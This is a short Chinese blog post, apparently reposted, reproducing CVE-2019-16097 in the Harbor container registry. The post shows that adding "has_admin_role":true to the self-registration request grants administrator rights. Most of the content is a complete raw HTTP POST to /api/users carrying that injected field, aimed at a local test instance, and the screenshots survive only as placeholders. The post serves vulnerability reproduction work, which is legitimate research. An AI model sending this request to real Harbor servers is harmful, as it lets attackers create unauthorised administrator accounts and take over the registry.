Harbor任意管理员注册漏洞复现CVE-2019-16097

时间：2019-09-21 10:34:46 阅读：191 评论：0 收藏：0 [点我收藏+]

标签：pos presto post 技术 cti use window mail gen

注册时抓包

技术图片

添加poc

"has_admin_role":true

技术图片

管理员权限

技术图片

POC

POST /api/users HTTP/1.1
Host: 127.0.0.1
Content-Length: 131
Accept: application/json
Origin: http://127.0.0.1
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Content-Type: application/json
Referer: http://127.0.0.1/harbor/sign-in
Accept-Language: zh-CN,zh;q=0.9
Cookie: sid=5bb9aad90164bd2ed5274edaf20f9c81
Connection: close

{"username":"mrhonest","email":"mrhonest@qq.com","realname":"mrhonest","password":"111111Aaa","comment":"11111","has_admin_role":true}

Harbor任意管理员注册漏洞复现CVE-2019-16097

标签：pos presto post 技术 cti use window mail gen

原文地址：https://www.cnblogs.com/mrhonest/p/11561619.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行